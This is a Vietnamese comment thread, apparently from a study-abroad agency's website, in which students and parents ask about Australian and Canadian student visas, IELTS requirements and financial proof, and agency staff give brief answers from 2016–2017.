  hoaipt@megastudy.edu.vn: Chào em, tư vấn viên sẽ liên hệ trực tiếp tới em nhé.
  Vào lúc: 19/04/2017, 17:05:17
 • Lê Thúy: Chào a/,em sn 1992, muốn theo học ngành thạc sỹ môi trường tại đại học Tasmania ở ÚC. Em đã kết hôn và hiện tại gia đình chồng đều đang ở bên Melbourn theo diện visa 866. Em đi du học thì có thể đưa chồng sang cùng luôn được không ạ, về tài chính có thể chứng minh được đủ. em cảm ơn!
  Vào lúc: 14/04/2017, 15:35:30 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:49
  e: e
  Vào lúc: 03/10/2022, 01:05:16
  hoaipt@megastudy.edu.vn: Chào em, về trường hợp của em tư vấn viên sẽ liên hệ trực tiếp với em nhé.
  Vào lúc: 14/04/2017, 16:32:58
 • hà an: Ad ơi tư vấn cho em về khóa thạc sĩ Tesol tại đại học Griffith với ạ.
  Vào lúc: 13/04/2017, 18:35:20 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:51
  e: e
  Vào lúc: 03/10/2022, 01:05:17
  hoaipt@megastudy.edu.vn: Hi em, megastudy sẽ trực tiếp gọi điện tư vấn cho em nhé!
  Vào lúc: 14/04/2017, 09:26:04
 • Nguyễn thị diệu ái: Xin chào, em muốn biết hiện tại em đã kết hôn và có thời gian nghỉ học 5 năm kể từ khi tốt nghiệp thpt . Vậy em vẫn có khả năng xin visa du học úc chứ
  Vào lúc: 30/03/2017, 21:39:05 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:52
  e: e
  Vào lúc: 03/10/2022, 01:05:19
  hoaipt@megastudy.edu.vn: Hi em, em vẫn có khả năng xin visa du học Úc, miễn là em có lộ trình học tập rõ ràng và có sự chuẩn bị hồ sơ tốt em ạ!
  Vào lúc: 14/04/2017, 09:27:04
 • Phung: Ad ơi cho e hỏi là e muốn học ngành quản lý du lịch khách sạn ở Úc
  Vào lúc: 24/03/2017, 14:31:03 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:54
  e: e
  Vào lúc: 03/10/2022, 01:05:21
  Megastudy: Megastudy sẽ liên hệ với bạn để tư vấn.
  Vào lúc: 24/03/2017, 16:07:05
 • Phi Pham: Em có người anh bên úc mới định cư được nhờ cưới vợ có quốc tịch bên đó. Em có bạn gái và dự định sẽ kết hôn. Em thì vừa ra trường được nữa năm và công việc chưa ổn định, bạn gái em thì 3 tháng nữa ra trường. Vậy cho em hỏi giờ có cách nào để em và bạn gái em qua Úc được không? Em cảm ơn nhiều lắm !!
  Vào lúc: 14/03/2017, 21:44:36 - Trả lời

  e: e
  Vào lúc: 03/10/2022, 12:52:56
  hoaipt@megastudy.edu.vn: Chào bạn, phía Megastudy chỉ hỗ trợ các bạn sang úc du học không hỗ trợ các hình thức khác. Nếu như bạn mong muốn du học thì Megastudy rất vui khi có thể đồng hành cùng các bạn.
  Vào lúc: 15/03/2017, 09:35:06
 • Candy: Ad ơi cho e hỏi là e muốn học ngành quản lý du lịch khách sạn ở Úc thì nên học trường đại học nào ạ? (Trường đại học nổi tiếng dễ xin vc ấy ạ!!!) E cảm ơn ạ!
  Vào lúc: 12/03/2017, 11:39:22 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, lựa chọn trường theo bản thân chị phụ thuộc vào bản thân mình - mình nên chọn trường phù hợp với mình chứ không phải trường tốt. Tư vấn sẽ liên hệ lại với em để tư vấn thông tin phù hợp.
  Vào lúc: 13/03/2017, 10:25:31
 • Trần Ngọc: Hiện tôi muốn khoảng tháng 12 sẽ cho con nhập học lớp 6 bên Úc, tôi sẽ đi theo con tôi để giám hộ, tôi có được phép làm thêm không?! Tôi có bằng ĐH Luật ở VN, khi qua Úc, tôi có thể học nghề gì mà luật bên đó cho phép, chuẩn Ielts là mấy điểm để có thể nhập cư trước khi con tôi tròn 18 tuổi? Xin cám ơn
  Vào lúc: 08/03/2017, 10:55:20 - Trả lời

  hoaipt@megastudy.edu.vn: Chào chị, chị vui lòng cung cấp rõ cấp bậc con chị muốn học hoặc con chị năm nay bao nhiêu tuổi để chị có thể đi theo giám hộ. Khi sang úc với tư cách người giám hộ theo pháp luật quy định chị không được phép đi làm thêm. Nếu con chị học THPT thì không nhất thiết phải có chứng chỉ tiếng anh quốc tế. Điều kiện để nhập cư sẽ có nhiều yếu tố cộng lại. Phía Megastudy chỉ làm lĩnh vực du học nên mạn phép không tư vấn vấn đề nhập cư. Cám ơn chị!
  Vào lúc: 13/03/2017, 10:24:36
 • phạm tô ni: Chào chị.em là sinh viên năm 3 trường đh khoa học tự nhiên ngành vật lý kỹ thuật nhưng đã bỏ học 1 năm. Vì em ko thích ngàng này nữa.em định du hoc đại học ngành công nghệ thông tin tại úc. Điểm IELTS của em là 6.0 và điểm tốt nghiệp thpt của em dc khá 7.3 ạ. Trường hợp em có khó xét visa ko a.hay là em nên thi lại và học đại học 1 năm để xét visa du học đh úc cho dễ ạ?
  Vào lúc: 08/03/2017, 02:33:03 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, với trường hợp của em mình vẫn có thể làm hồ sơ như bình thường, nhưng mình cần bảo vệ được quan điểm của mình tại sao mình lại bỏ dở giữa chừng. và Úc là nước như thế nào để mình tìm đến để học.
  Vào lúc: 13/03/2017, 10:22:21
 • Phan Ellias: Cho em hỏi bên chương trình thpt đó có khó hay gắt không hả chị
  Vào lúc: 23/02/2017, 09:31:21 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, tư vấn viên sẽ liên hệ trực tiếp tới em em nhé.
  Vào lúc: 25/02/2017, 09:29:31
 • Nguyễn Thị Quỳnh Như: hiện nay e đang học 12 nếu muốn đi du học úc và học về chuyên ngành thương mại quốc tế, thế ở Việt Nam e có phải thi Đại Học hay không hay chỉ cần bằng tốt nghiệp là có thể đi ạ... e đang định thi tốt nghiệp rùi học anh văn lấy bằng ielts sau đó đi du học vậy có được không ạ, nếu được vậy qua đó học bắt đầu từ đâu hay vào chuyên ngành thương mại quốc tế luôn ạ ?
  Vào lúc: 21/02/2017, 20:52:43 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, em chỉ cần tốt nghiệp lớp 12 ở VN là em có thể apply đi du học Úc em nhé.
  Vào lúc: 22/02/2017, 09:50:51
 • Lê Lý Thùy Trinh: Chào bạn, Trường hợp của mình là chồng mình có quốc tịch Taiwan, mình thì quốc tịch Việt Nam. Hiện tại chồng mình muốn học cao học ngành thạc sỹ nghiên cứu về IT tại trường đại học Adelaide, dự kiến học vào năm 2018 và muốn bảo lãnh mình đi theo cùng. Bạn cho mình hỏi là chồng mình có thể nộp hồ sơ tại lãnh sứ quán Úc tại Việt Nam hay không?Trường hợp chồng mình có phải chứng minh tài chính hay không (lưu ý là chồng mình mang quốc tịch Taiwan)? Nếu có thì số tiền yêu cầu phải chứng mình (sổ tiết kiệm hoặc tài sản) cho cả hai vợ chồng là bao nhiêu? Mình cám ơn bạn nhé.
  Vào lúc: 15/02/2017, 14:15:16 - Trả lời

  hoaipt@megastudy.edu.vn: Chào bạn, tư vấn viên sẽ liên hệ trực tiếp với bạn về vấn đề này nhé.
  Vào lúc: 16/02/2017, 15:14:12
 • hoàng hà: tôi muốn biết lứa tuổi thấp nhất có thể sang Canada du học là bao nhiêu? Có thể sang Canada học từ bậc tiểu học không? Nếu không thì cho tôi biết ở độ tuổi nào thì du học Canada tốt nhất? Tôi cần chuẩn bị gì khi đi du học (khả năng tài chính, ngôn ngữ...)?. Nhà tôi không có người thân ở nước con tôi đi du học, vậy con tôi sẽ ăn ở, đi học như thế nào?
  Vào lúc: 11/02/2017, 21:07:37 - Trả lời

  hoaipt@megastudy.edu.vn: Chào phụ huynh, tư vấn du học Canada sẽ gọi điện và tư vấn cụ thể tới chị.
  Vào lúc: 16/02/2017, 15:12:07
 • Vi Dân: Cho em hỏi, nếu học thạc sỹ tiếng Anh hệ 1 năm tại Úc thì có được ở lại 2 năm để làm việc không ạ?
  Vào lúc: 03/02/2017, 21:02:47 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, quy định bộ di trú Úc đưa ra cho du học sinh Quốc tế các bạn phải tham gia khóa học từ 2 năm trở lên mới được ở lại làm việc để gia tăng kinh nghiệm nghề nghiệp nhé em.
  Vào lúc: 06/02/2017, 16:10:13
 • Nguyễn Văn Phương: cho em hỏi: em vừa tốt nghiệp cử nhân ngành quản trị kinh doanh (chuyên ngành thẩm định giá)tháng 07/2016 loại khá (2.97điểm/điểm 4).em mong muốn có học bổng để học thạc sỹ ngành thẩm định giá tại úc có được không ạ, vì em được biết ngành này là ngành ưu tiên tại úc ?em chỉ cần học thêm bằng ielts 6.5-7 là được chứ ạ?
  Vào lúc: 29/01/2017, 20:39:38 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, vấn đề nhận được học bổng hay không phụ thuộc vào nhiều yếu tố. Tư vấn viên sẽ liên hệ với em để cung cấp thông tin thêm nhé em.
  Vào lúc: 06/02/2017, 16:09:22
 • My Nguyễn: Hiện tại em đang là sinh viên năm 3 học ngành Thông tin học trường Đại học Cần Thơ. Em có đam mê với ẩm thực nên em muốn sau khi tốt nghiệp đại học (2018) sẽ đi du học Úc. Em dự định chọn khóa Cao đẳng nâng cao đầu bếp trường Le Cordon Bleu tại Adelaide, nhưng em lo rằng đã tốt nghiệp đại học mà lại đi học nghề thì visa khó khăn. Trong thời gian này em có học thêm khóa đầu bếp tại VN để làm tiền đề, em cũng xác định học IELTS ít nhất 5.0 Không biết với lộ trình và mục tiêu như vậy khả năng visa thành công bao nhiêu ạ? Em cảm ơn.
  Vào lúc: 05/01/2017, 11:33:06 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, điều em đang lo lắng không ảnh hưởng gì tới việc xin visa em nhé. chỉ có điều em cần giải thích rõ vì sao em lại có lựa chọn như trên. Cùng với đó, hiện tại LCB đang phải chứng minh tài chính nên em cũng cần tìm hiểu về thủ tục thế nào là chứng minh tài chính
  Vào lúc: 06/01/2017, 10:14:38
 • Chi Cao: Em đi học tiến sĩ tại Perth theo diện học bổng, đã nộp hồ sơ visa online. Em khai luôn hồ sơ cho chồng em đi theo lồng trong hồ sơ chính của em. Khi em làm đến phần cung cấp scanned evidences, thì chỉ thấy yêu cầu giấy chứng nhận được học bổng của em ở phần chứng minh tài chính cho em. Ngoài ra ko thấy yêu cầu bằng chứng chứng minh tài chính cho chồng em. Chúng Em đã chuẩn bị sẵn sổ tiết kiệm với số tiền được quy định cho đủ luôn 4 năm học tiến sĩ. Ngoài ra khi thực hiện trả tiền phí làm visa online chỉ thấy hệ thống tính tiền của người nộp chính là em mà ko tính phí của dependent.Em đang băn khoăn lắm. Mong được tư vấn.em cảm ơn!
  Vào lúc: 30/12/2016, 23:43:33 - Trả lời

  hoaipt@megastudy.edu.vn: chào bạn, trong những câu hỏi khi khai sẽ có câu có ai đi cùng bạn hay không? bạn xem lại mình trả lời có hay không nhé. Nếu trong quá trình đọc hồ sơ của bạn lãnh sự quán thấy thiết sót sẽ chủ động liên hệ theo số điện thoại được ủy quyền để cung cấp thông tin. Nên bạn không phải lo lắng quá. Chúc bạn thành công!
  Vào lúc: 03/01/2017, 14:34:37
 • hoàng: Xin chào các anh/chị! Hiện nay e đang học lớp 12 học lực lớp 10,11 là khá, e cũng đã có ielts 5.5. E đang dự định đăng ký khóa học dự bị sau đó chuyển tiếp lên đại học tại trường University of Melbourne. E có anh ruột có visa du học hiện đang học thạc sĩ tại RMIT Melbourne. Cho e hỏi anh của em có là người bảo lãnh cho e được không và thời gian xét visa cho trường hợp của em là bao lâu?
  Vào lúc: 30/12/2016, 19:30:22 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, trước tiên chị muốn tư vấn em nên cân nhắc kỹ lại việc học dự bị đại học hay học xong 12 hãy đi vì giờ cũng đã kết thúc học kỳ 1 năm lớp 12 rồi nó không phải thời gian thực sự phù hợp. Thứ hai, em đi học trường đại học melbourne trường được miễn chứng minh tài chính nên không cần phải làm thủ tục tài chính. Thứ ba, anh trai em đang đi học vì thế không thể bảo lãnh tài chính cho em được em nhé.
  Vào lúc: 03/01/2017, 14:31:58
 • Võ Thị Minh Thu: em có anh họ ở Úc định cư được 4 năm, có nhà riêng, có vợ và hai con, thu nhập 40.000aud. điều kiện như vậy có thể bảo lãnh cho em du học không ạ
  Vào lúc: 29/12/2016, 00:25:38 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, anh họ bảo lãnh sẽ hơi khó khăn vì đó không phải là anh ruột của em. Ngoài ra anh họ của em có thu nhập như trên nhưng chị vợ có đi làm không hay tất cả gia đình phụ thuộc vào mức lương trênn. Mức thu nhập trên anh này có thể hiện qua giấy tờ đóng thuế hay không? Nói tóm lại hồ sơ bảo lãnh sẽ phụ thuộc rất nhiều vào tài chính của người bảo lãnh.
  Vào lúc: 29/12/2016, 10:00:03
 • Lý Mai: Hiện e đang học lớp 12 , gia đình dự định cho e đi du học Úc khi thi xong thpt nhưng hiện tiếng anh giao tiếp bt thì e ok lắm nhưng e k có chứng chỉ ielts thì có đi du học được không ạ vs lại e cũng có dì bên đó hỗ trợ ạ
  Vào lúc: 15/12/2016, 21:25:37 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, để thuận lời nhất cho việc xin visa chị khuyên chân thành em nên ôn và thi một chứng chỉ tiếng anh quốc tế ví dụ như IELTS tối thiểu nhất là 4.5 em nhé.
  Vào lúc: 17/12/2016, 11:22:14
 • Lê thị trinh: Chị ơi cho em hỏi, bảng điểm cấp 3 e trung bình, em học cao đẳng ngành du lịch thì học lực khá, có ielts 4.5, e tính xin học đại học trường lv1, học ngành khách sạn ( e ra trường được 1 năm rồi và đang làm ở khách sạn), vậy tỉ lệ e xin được thư mời và đậu visa cao không ạ
  Vào lúc: 10/12/2016, 15:47:39 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, với tình hình hiện tại em hoàn toàn có thể apply hồ sơ đi Úc em nhé. Nếu em có điều kiện và có quyết tâm hơn thì em luyện thêm tiếng anh cao hơn chút nữa cho chị là ok nhé.
  Vào lúc: 12/12/2016, 09:12:54
 • Hoàng thị thanh mai: Hiện tại e đang hoc lớp 12 e muon xin du học úc để học nấu ăn.cho e hỏi trường nào k đòi hỏi tieng anh.hoặc tiếng anh với trình độ thấp thui
  Vào lúc: 10/12/2016, 12:51:52 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, đi du học Úc trường nào cũng cần yêu cầu trình độ tiếng anh tối thiểu thì thường sẽ quy ra mức IELTS 4.5 ( em có thể làm bài thi test với trường với những trường cho phép) còn em hãy xác định đã đi du học là phải có tiếng anh nếu không sang đó em sẽ không thể học tốt và hòa đồng được với môi trường mới.
  Vào lúc: 12/12/2016, 09:14:24
 • Nguyễn Thy: Em 16 tuổi và đang trong thời gian xin thư xác nhận nhập học ở Úc. Vậy có cần phải thi ielts không ạ? và thời gian chờ thư là bao lâu ạ?
  Vào lúc: 06/12/2016, 22:30:09 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, chị chưa rõ em xin thư nhập học của trường THPT hay bậc cao đẳng đại học. Nếu em đi học THPT thì em không cần phải thi chứng chỉ IELTS em nhé. Về vấn đề thư mời sẽ tùy thuộc vào từng trường nhưng thông thường sẽ giao động khoảng 1-2 tuần em nhé.
  Vào lúc: 07/12/2016, 10:27:18
 • Hồ Thị Mỹ Yến: Chào add,e tốt nghiệp tháng 12 vừa rồi,hiện e đang có ý định du học thạc sĩ tại úc,cị có thể giải đáp cho e về chuẩn tiếng anh và chứng minh tài chính ko ạ,trường hợp e có anh cị định cư ở úc có thể chứng minh thu nhập bên úc đc ko,và nếu ielts <6. thì xin visa hơi khó ạ c,
  Vào lúc: 06/12/2016, 12:10:58 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, trước tiên chuẩn vào thẳng bậc thạc sỹ là IELTS 6.5 không kỹ năng nào dưới 6.0.Nhưng nếu em không đủ điều kiện vào thẳng tiếng anh em có thể đạt mức tối thiểu IELTS 5.0 không kỹ năng nào < 4.5 để sang đó mình học thêm một khóa tiếng anh nữa nhé. Trường hợp của em có người nhà bên Úc muốn đứng ra bảo lãnh thì người đó cần cung cấp các giấy tờ liên quan đến công việc mức lương làm sao tính toán ít nhất cũng phải đủ chi trả chi phí của gia đình bên kia và học phí cũng như chi phí sinh hoạt của em.
  Vào lúc: 07/12/2016, 09:52:04
 • Phuong: Chào bạn. Mình năm nay 32 tuổi, mong muốn đi du học Úc ngành ẩm thực/ hoặc quản trị khách sạn, mình đã tham khảo thông tin trường Le Cordon Bleu, nhưng không biết là tuổi của mình có được chấp nhận tại trường không. Nếu không thì có chuyên ngành gì khác phù hợp cho mình không. Mình tốt nghiệp đại học ngành quản trị du lịch. Cảm ơn bạn nhiều.
  Vào lúc: 30/11/2016, 16:55:54 - Trả lời

  hoaipt@megastudy.edu.vn: dear chị, tư vấn viên sẽ liên hệ và tư vấn thông tin tới chị.
  Vào lúc: 05/12/2016, 14:07:20
 • mai Kim Yến: cho e hỏi e nằm trong viện bảo lãnh đi Mỹ v bây giờ trong thời gian chờ em muốn du học sang Úc đc k. A/c tư vấn giup e với
  Vào lúc: 30/11/2016, 10:30:55 - Trả lời

  hoaipt@megastudy.edu.vn: dear em, Em hoàn toàn có thể làm được hs đi du học Úc em nhé.
  Vào lúc: 05/12/2016, 14:06:44
 • Quang Le: Cho e hỏi, E tốt nghiệp đại học ở Việt Nam ngành kiểm toán trong năm nay, giờ em muốn đi du học ở Úc ngành khác ( ví dụ nursing) thì có được không ạ?
  Vào lúc: 28/11/2016, 16:06:02 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, em hoàn toàn có thể học khác ngành nhưng nếu chuyển hẳn sang một ngành khác có đặc thù khác ví dụ như Nursing em nói thì cần phải cân nhắc nhé.
  Vào lúc: 05/12/2016, 14:05:23
 • Thy: Chào anh chị, anh chị cho em hỏi là nộp đơn visa 500 có sup applicant là de facto là người ngoại quốc thì tầm khoảng bao lâu là có visa hở anh, với điều kiện là em đã có giấy tờ đầy đủ, kể cả khám sức khoẻ, biometrics, etc?
  Vào lúc: 21/11/2016, 19:42:29 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, Việc khi nào có Visa hay cần cung cấp thêm giấy tờ gì thì mình không nắm chắc được. Nhưng phía lãnh sự quán sẽ xem xét hồ sơ của em trước ngày em nhập học và thông báo tình trạng visa sớm. nếu cần bổ sung thêm giấy tờ gì phía lãnh sự quán thông báo trong tài khoản mà em đăng ký em nhé. trong thời gian này hãy luôn check mail hoặc tài khoản em đăng ký nộp visa.
  Vào lúc: 05/12/2016, 14:03:19
 • AnhNguyen: Em đang học gần hết học kỳ 1 lớp 11. Dự định xin nghỉ học để ôn Tiếng anh 1 năm, bậc THPT có cần bằng IELTS ko ạ? Vậy năm sau em có vào học chương trình lớp 11 ở úc được không?
  Vào lúc: 18/11/2016, 22:19:29 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, nếu em học xong lớp 11 em sẽ có hai hướng một là THPT sẽ không cần có chứng chỉ tiếng anh quốc tế gia đình em cần chứng minh tài chính, hai là hướng dự bị đại học thì lại cần có chứng chỉ tiếng anh quốc tế một vài trường được miễn chứng minh tài chính. Hy vọng một vài thông tin trên sẽ giúp em có cái nhìn khái quát về việc đi du học cần làm gì.
  Vào lúc: 19/11/2016, 09:18:21
 • Hoàng Thị Vân Anh: Cho em hỏi, em đã có bằng master of commerce tại Úc năm 2011 (khóa học 1.5nam). Sau đó, về VN làm việc. Hiện, em muốn quay lại ÚC học thêm và xin TR thì thời gian học trước đây có được tính không ah (1.5 năm)?
  Vào lúc: 18/11/2016, 15:49:03 - Trả lời

  hoaipt@megastudy.edu.vn: chào bạn, với trường hợp của bạn cần quan tâm tới các yếu tố sau: 1 là, để gia hạn visa (TR) sau khi học xong các bạn cần học các khóa có thời gian từ 2 năm trở lên; 2 là, bạn đã quay về việt nam một thời gian khá lâu nên sẽ không thểm tham gia chương trình này được bạn nhé.
  Vào lúc: 19/11/2016, 09:15:53
 • Thanh Tâm: Dạ cho em hỏi em vừa tốt nghiệp đại học và muốn học thạc sĩ ở úc, do em chưa có bằng ielts nên em muốn hỏi thời gian để chuẩn bị các giấy tờ đi du học khi đã có bằng ilets đủ điều kiện là bao lâu ạ? Vì em muốn học vào khoá sớm nhất có thể, nên em muốn biết để ôn thi & đăng kí thi ilets trước. Em cám ơn ạ.
  Vào lúc: 16/11/2016, 00:50:09 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, nếu em có đủ giấy tờ thì chị cần tổi thiểu là 1 tháng tối đa 2 tháng để hoàn tất hồ sơ của em từ lúc dịch thuật đến xin thư mời và có kết quả visa em nhé.
  Vào lúc: 17/11/2016, 14:33:22
 • Nguyễn Hải Đăng: Anh chị cho em hỏi là em đi học đại học ở VN hết năm đầu rồi em làm hồ sơ đi du học Úc học hệ đại học từ đầu được không? Có cần phải học cùng ngành không ạ?
  Vào lúc: 13/11/2016, 22:55:17 - Trả lời

  hoaipt@megastudy.edu.vn: dear em, với trường hợp của em hoàn toàn có thể đăng ký lại học đại học được em nhé, và cũng không nhất thiết phải học lại ngành mình đã học ở Việt nam.
  Vào lúc: 14/11/2016, 09:30:24
 • Đào Hồng Anh: Em nộp hồ sơ từ 4/10 nhưng mãi hơn một tháng ngta chưa gđ để phỏng vấn ạ mà 4/12 e nhập học .liệu em có bị chễ kì nhập học k ạ .Và hồ sơ nào cũng gđ để phỏng vấn hả chị
  Vào lúc: 08/11/2016, 14:48:03 - Trả lời

  hoaipt@megastudy.edu.vn: chúc các em thành công!
  Vào lúc: 10/11/2016, 11:38:37
  Nguyễn Tiến Đạt: ok 0967373690 :)
  Vào lúc: 09/11/2016, 23:25:44
  Đào Hồng Anh: a đạt cho e sđt a đii để e ib hỏi cái
  Vào lúc: 09/11/2016, 20:01:16
  Nguyễn Tiến Đạt: Anh nộp hồ sơ cũng ngày 4/10 này =)) giờ vẫn chưa có phản hồi hay pv gì, mà ngày 3/11 vừa rồi anh phải nhập học rồi. nhưng phải lùi ngày nhập học cho đến khi có thông báo visa ( rồi mới thay đổi đc CoE) lâu quá.... haizzzzzz :((
  Vào lúc: 09/11/2016, 10:33:51
 • Đào Hồng Anh: Em nộp hồ sơ từ 4/10 nhưng mãi hơn một tháng ngta chưa gđ để phỏng vấn ạ mà 4/12 e nhập học .liệu em có bị chễ kì nhập học k ạ .Và hồ sơ nào cũng gđ để phỏng vấn hả chị
  Vào lúc: 08/11/2016, 14:47:19 - Trả lời

  hoaipt@megastudy.edu.vn: chào em,người phụ trách xét duyệt hồ sơ của em sẽ chủ động sắp xếp và liên hệ với em. Với hồ sơ của em có hai trường hợp là em không bị phỏng vấn hoặc người ta chưa xét hồ sơ của em. Chúc em thành công.
  Vào lúc: 10/11/2016, 11:37:36
 • Nguyễn cát tường: Em dự định du học năm lớp 12 tại Úc nên anh(chị) cho em hỏi em có cần điểm thi ielts không và điều kiện bắt buộc để học năm 12 tại Úc là gì? Em con yếu một vài môn như toán thì có thể đi du học không?
  Vào lúc: 07/11/2016, 19:20:14 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, nếu em đi học bậc trung học phổ thông thì em không cần thi kết quả IELTS em nhé. Em có nói em yếu một vài môn yếu như môn toán cụ thể là yếu như thế nào? nếu yếu quá điểm quá thập thì chị cũng e rằng sẽ hơi khó khăn. Đi THPT là sẽ phải chứng minh tài chính nhé em.
  Vào lúc: 10/11/2016, 11:36:15
 • Đào Hồng Anh: vâng chị ,hay người ta vẫn chưa xem xét hồ sơ của em thì ngta mới chưa gđ ạ. tại em không có chứng chỉ tiếng anh. thì liệu em có đi được không ạ và thời gian chờ visa của em là bao lâu nữa ạ
  Vào lúc: 04/11/2016, 15:21:27 - Trả lời

  Đào Hồng Anh: e tận 6/12 mới nhập học chị ạ :))) nhưng mãi ngta vẫn chưa phỏng vấn hồ sơ nào cũng phỏng vấn hả chị
  Vào lúc: 08/11/2016, 14:27:05
  hoaipt@megastudy.edu.vn: Chào em, mỗi trường hợp một khác em ạ, vì Megastudy không phụ trách hồ sơ của em từ đầu nên khó để trả lời em chính xác vì việc xét duyệt của lãnh sự dựa trên hồ sơ của từng sinh viên, em cố gắng chờ, nhờ sự hỗ trợ của bên làm hồ sơ cho em. Nếu trường hợp hồ sơ xét lâu quá ngày nhập học em có thể chủ động liên hệ lãnh sự để được hỗ trợ nhé.
  Vào lúc: 07/11/2016, 09:58:19
 • trang: cho em hỏi: em đã được lãnh sự phỏng vấn hơn một tuần rồi mà chưa có kết quả. Vậy e có bị trượt visa k ạ và thời gian thông thường lãnh sự phản hồi là bao nhiêu ạ? em cảm ơn!
  Vào lúc: 04/11/2016, 12:42:20 - Trả lời

  Đào Hồng Anh: cậu cho tớ hỏi được không cậu nộp hồ sơ từ bao giờ mà ngta đã gđ phỏng vấn rồi ạ
  Vào lúc: 04/11/2016, 15:23:35
  hoaipt@megastudy.edu.vn: chào em, em đã được lãnh sự phỏng vấn chứng tỏ rằng hồ sơ của em đã được người ta xem xét và đang trong quá trình xử lý thông tin. Theo kinh nghiệm của chị em sẽ có kết quả trong một vài ngày tới thôi em.
  Vào lúc: 04/11/2016, 13:55:41
 • Đào Hồng Anh: chào anh chị anh chị cho em hỏi là e đã nộp hồ sơ xin visa du học úc được 1 tháng mà vẫn chưa thấy người ta gọi điện phỏng vấn em liệu em có bị trượt không ạ
  Vào lúc: 03/11/2016, 15:11:28 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, người xét duyệt hồ sơ của em sẽ cân đối thời gian em học sao cho phù hợp em nhé. xét lâu hay nhanh nó không ảnh hưởng gì đến kết quả visa của em em nhé.
  Vào lúc: 04/11/2016, 13:54:31
 • Ngọc Hân: Chào chị, hiện em muốn đi du học Úc khóa học Graduate Diploma tại Victoria University. Hiện Ielts của em là 6.5, nhưn bảng điểm đại học không đẹp lắm vì lúc học em có fail vài môn nhưng đều đã học lại và đạt B,B+, tốt nghiệp Loại Khá. Về phần tài chính thì nhà em không có chứng minh thu nhập hằng tháng được nhưng có thể chứng minh bằng tài sản và sổ ngân hàng được không và học bạ của em như vậy có khả năng được trường chấp nhận không? Có gây khó khăn gì trong việc xin visa không ạ?
  Vào lúc: 29/10/2016, 16:45:14 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, với Victoria khi lựa chọn bắt buộc em cần phải chứng minh thu nhập phát sinh hàng tháng, nếu trong trường hợp nhà em có tài sản thì có thể cho thuê để phát sinh thu nhập em nhé. Nếu em muốn đi Úc nhưng khó chứng minh tài chính em có thể lựa chọn những trường miễn chứng minh tài chính.
  Vào lúc: 31/10/2016, 09:37:41
 • Hiếu Thảo: Cho mình hỏi khi mình nhận được HAP ID và Referral Letter đi khám sức khỏe thì hiệu lực của phiếu khám sức khỏe có thời hạn bao lâu? Mình có phải đăng ký visa ngay sau khi có kết quả sức khỏe không?
  Vào lúc: 27/10/2016, 15:31:38 - Trả lời

  hoaipt@megastudy.edu.vn: chào bạn, việc khám sức khỏe bạn có thể chủ động khám ngay khi có Letter offer cũng hoàn toàn có thể ok bạn nhé. Sau khi khám xong kết quả sẽ tự động chuyển về nơi xét duyệt hồ sơ cơ bản bạn không biết được kết quả khám sức khỏe của ban thế nào bạn nhé.
  Vào lúc: 31/10/2016, 09:36:04
 • My: Em muốn đi du học thạc sĩ ở trường victoria Úc, em được biết trường xét cấp visa bậc 1, vậy sổ tiết kiệm cần khoảng bao nhiêu thì đậu visa ạ?
  Vào lúc: 27/10/2016, 14:57:19 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, theo thông tin của bộ di trú Úc bắt đầu từ ngày 01/07/2016 Victoria Uni không còn nằm trong visa bậc 1 nữa em nhé. Như vậy, em cần phải chứng minh tài chính ( chứng minh phát sinh thu nhập của người đứng ra bảo lãnh) khi em đi du học lựa chọn trường này.
  Vào lúc: 31/10/2016, 09:31:12
 • Vũ Thị Huệ: cho e hỏi, e đã tốt nghiệp ĐH năm 2013, loại khá. e đi làm được 3 năm rồi. bg e muốn làm hồ sơ du học bên Úc, e có thể chứng minh tài chính, nh chứng chỉ Ielts e chưa có. Vậy trường hợp như e có trường nào bên Úc chấp nhận được k? trung tâm tư vấn giúp e ạ!
  Vào lúc: 26/10/2016, 11:47:35 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, với trường hợp của em em có thể lựa chọn những trường chấp nhận làm bài thi test với trường em nhé. Tuy nhiên, dù em lựa chọn việc cung cấp chứng chỉ hay lựa chọn làm bài test với trường thì em cũng cần có một mức tiếng anh tối thiểu em nhé.
  Vào lúc: 31/10/2016, 09:29:29
 • Vinh Khang: e hiện là sinh viên năm 3 trường Sư phạm kĩ thuật TPHCM. Bảng điểm tại trường đại học e tương đối thấp từ 4.0-5.5 do e cảm thấy môi trường học của e không phù hợp nên e muốn sang úc du học và học lại từ đầu 1 ngành khác. bảng điểm của e như vậy có ảnh hưởng nhiều không ạ?
  Vào lúc: 25/10/2016, 23:38:24 - Trả lời

  Vinh Khang: Viec giai trinh ly do se do cong ty tu van du hoc giai trinh dung khong a?
  Vào lúc: 26/10/2016, 15:11:25
  hoaipt@megastudy.edu.vn: chào em, với trường hợp của em vẫn có cơ hội làm hồ sơ du học úc nhưng em cần cân nhắc thật kỹ vì với hồ sơ như em sẽ được hỏi rất kỹ về việc lý do vì sao em học hết 2 năm đang sang năm thứ 3 mới chuyển hướng em nhé.
  Vào lúc: 26/10/2016, 10:09:44
 • tuấn: cho e hỏi nếu e đang học 12 thì có thể làm giấy tờ để đi dh úc không
  Vào lúc: 24/10/2016, 23:41:16 - Trả lời

